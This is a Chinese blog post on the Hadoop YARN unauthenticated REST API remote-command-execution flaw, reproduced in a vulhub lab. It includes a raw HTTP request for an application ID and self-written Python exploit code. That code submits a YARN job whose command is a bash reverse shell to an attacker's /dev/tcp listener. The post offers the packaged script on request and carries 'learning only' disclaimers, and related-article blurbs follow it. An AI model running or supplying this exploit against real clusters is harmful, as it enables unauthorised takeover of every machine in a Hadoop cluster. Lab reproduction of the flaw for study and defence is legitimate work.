hadoop漏洞_Hadoop 未授权访问漏洞(exp核心代码实现)

最新推荐文章于 2025-05-15 15:58:58 发布
最新推荐文章于 2025-05-15 15:58:58 发布
阅读量8.5k 收藏 1
点赞数
文章标签: hadoop漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_35758982/article/details/112245652
版权
本文详细介绍了Apache Hadoop YARN的一个安全漏洞,该漏洞允许攻击者未经认证通过REST API在集群中执行任意命令。首先,环境被搭建,然后解释了漏洞的成因,接着演示了如何复现此漏洞,包括获取ID值和使用EXP反弹shell。作者提供了自编的EXP核心代码,并强调脚本仅用于学习研究,禁止非法使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、环境搭建:

进入镜像目录:

cd vulhub/hadoop/unauthorized-yarn

启动环境:

docker-compose up -d

访问8088端口

3924222fd1b7d70eca1ac734f6de7905.png

二、漏洞描述:

Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度)

漏洞原因:

负责对资源进行同一管理调度的ReasourceManager组件的UI管理界面开放在8080/8088端口,攻击者无需认证即可通过REST API部署任务来执行任意命令,最终可完全控制集群中所有的机器

三、漏洞复现:

访问ws/v1/cluster/apps/new-application可以获取id的值:

POST /ws/v1/cluster/apps/new-application HTTP/1.1Host: 192.168.136.131:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0

3c9d415e99e222a32e7d958f4fb2da9f.png

直接使用EXP进行反弹shell:

d1fdc0e01226b49d2d5de200307293b0.png

python3 Hadoop_EXP.py http://192.168.136.131:8088 -l 192.168.136.129 -p 7777

成功收到反弹shell:

8d507e90669da29ccd2d4ab5adf5cbf5.png

脚本的核心代码(自写):

具体实现思路看代码注释

class Hadoop:    def __init__(self):        self.headers = {            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',        }    def rshell(self):        # 获取application-id的值        r = requests.post(result.url + '/ws/v1/cluster/apps/new-application', headers=self.headers)        id = json.loads(r.text)['application-id']        # 执行命令,调用 Submit Application API 提交        data = {            'application-id': id,            'application-name': 'getshell',            'am-container-spec': {                'commands': {                    'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1' % (result.lhost, result.lport)                },            },            'application-type': 'YARN',        }        rr = requests.post(result.url + '/ws/v1/cluster/apps', headers=self.headers, json=data)        print("[+] 执行完成!")    def run(self):        print(f"[*] 请先在你的vps:{result.lhost} 监听:{result.lport} 端口,等待shell回连!")        self.rshell()

脚本已经打包好了,需要的后台留言:Hadoop exp,链接有效期为7天,请注意保存,请仅用于学习研究!

各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

80a737148e6695ef9ab45c369e68e312.png

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

艾斯·歪
关注
DBA必备知识:Oracle面试题及参考答案(3万字长文)
大模型大数据攻城狮的专栏
04-12 705
在Oracle PL/SQL中,异常处理是一种错误处理机制,它允许程序在遇到错误时优雅地恢复。自定义异常处理可以提高程序的健壮性和可维护性。实现自定义异常处理的步骤:数据库重定义(Redefinition)是Oracle数据库中的一个高级特性,它允许在不卸载数据的情况下修改表或索引的结构。数据库重定义的用途:注意事项:修改数据类型:可以使用数据库重定义来更改列的数据类型,而不需要传统的ALTER TABLE...MODIFY操作。添加或删除列:可以添加新列或删除现有列,而不影响表中的数据。
未授权访问Hadoop 未授权访问漏洞
qq_68163788的博客
05-20 2752
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop未授权访问漏洞
可爱的我可爱的code
11-19 5077
漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以通过命令行操作多个目录下 的数据,如进行删除,下载,目录浏览甚至命令行行等操作,产生极大的危害。 环境 vulnhub 测试 启动环境 docker-compose up -d 访问 http://192.168.0.100:8088/cluster 通过REST API命令执行 利用过程: 在本地监听端
yarn任务筛选spark任务,判断内存/CPU使用超过限制任务
最新发布
sunxunyong的博客
05-15 354
yarn任务筛选spark任务,判断内存/CPU使用超过限制任务。
数据库安全:Hadoop 未授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 4393
Hadoop 未授权访问主要因HadoopYARN资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
你的数据安全么?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn资源管理系统未授权访问漏洞进行攻击...
weixin_34112208的博客
05-08 347
2019独角兽企业重金招聘Python工程师标准>>> ...
hadoop应用开发技术..._渗透技巧Hadoop命令执行
weixin_39895486的博客
11-29 329
0X00Hadoop介绍和漏洞原理Hadoop是一个由Apache的分布式系统基础架构,用户可开发分布式程序,充分利用集群的威力进行高速运算和存储,实现了一个分布式文件系统(Hadoop Distributed File System)。其中HDFS组件有高容错性的特点,并且部署在低廉的(low-cost)硬件上即可提供高吞吐量(high throughput)访问应用程序的数...
数栖平台V5.0.0新手必备:一站式入门教程与核心功能速成
本文详细阐述了平台的核心功能,包括用户验证流程、数据导入导出、项目管理、数据可视化、自动化工作流、云服务集成以及性能监控与优化等。同时,通过对实践应用案例的分析,探讨了平台在企业项目搭建、数据处理分析...
信息安全工程师第二版考试总结+笔记
热门推荐
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9565
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
蓝队面试知识点整理
qq_32350719的博客
05-07 8899
蓝队面试知识点整理
Hadoop-未授权访问漏洞复现
weixin_43071873的博客
11-18 1811
漏洞介绍: Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 漏洞复现: 使用vulhub搭建靶场 搭建完进入镜像,成功搭建 进入靶场。靶机ip:8088 exp如下: ##!/usr/bin/env python import requests import sys targe
Hadoop-yarn-未授权访问漏洞
qq_42735101的博客
06-26 2285
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-未授权访问漏洞复现。
二百四十、Hadoop——解决Hadoop 未授权访问漏洞
tiantang2renjian的博客
06-24 2182
Hadoop——解决Hadoop 未授权访问漏洞
漏洞复现 || Hadoop未授权访问反弹Shell漏洞
失心少年
07-13 1369
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop 未授权访问漏洞
玄道的网安博客
07-04 8948
前言 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作 环境搭建 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d 环境启动后,访问http://your-ip:8088即可看到Hadoop YARN ResourceManage
Hadoop 未授权访问漏洞总结
qq_45746681的博客
10-05 6913
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、Hadoop 未授权访问漏洞是什么?二、复现1.搭建环境2.复现 前言 记录下常见的未授权访问漏洞 一、Hadoop 未授权访问漏洞是什么? Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 二、复现 1
Hadoop-yarn-unauthorized 未授权访问漏洞
weixin_68177269的博客
08-13 717
Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当可导致未授权访问的问题,攻击者无需认证即可通过REST API部署任务来执行任意指令,最终完全控制服务器。靶场启动完成后,使用nmap扫描本机开放的端口,发现已经开启8088(yarn资源管理系统)
hadoop未授权访问漏洞危害
12-31
### Hadoop未授权访问漏洞的风险与影响 Hadoop作为一个分布式计算平台,广泛应用于大数据处理环境中。然而,如果存在未授权访问漏洞,则可能带来严重的安全风险。 #### 数据泄露风险 当Hadoop集群配置不当或缺乏适当的身份验证机制时,攻击者可以绕过正常的安全控制措施获得对敏感数据的读取权限。这可能导致大量个人隐私信息、商业机密以及知识产权遭到非法获取并外泄[^1]。 #### 系统完整性受损 除了能够查看存储于其中的数据之外,拥有未授权访问权的人还可以修改甚至删除这些文件。这种行为不仅会破坏原有业务逻辑所依赖的信息准确性,还可能会引发连锁反应,造成整个应用程序崩溃或者产生错误的结果输出。 #### 资源滥用隐患 未经授权的操作员也可能利用该缺陷执行恶意脚本,在节点上安装后门程序或其他形式持久化工具;更甚者发动DDoS攻击来消耗服务器资源,从而干扰合法用户的正常使用体验,并给企业带来经济损失和社会声誉损害。 ```python # 示例:模拟一个简单的HDFS命令注入场景(仅用于说明) hdfs dfs -put /local/path/file.txt /user/hadoop/destination/ ``` 此代码片段展示了如何通过命令行接口上传本地文件到HDFS中指定位置。但如果系统允许任意用户无需认证即可操作上述指令,则意味着任何人均可向集群内植入潜在危险的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值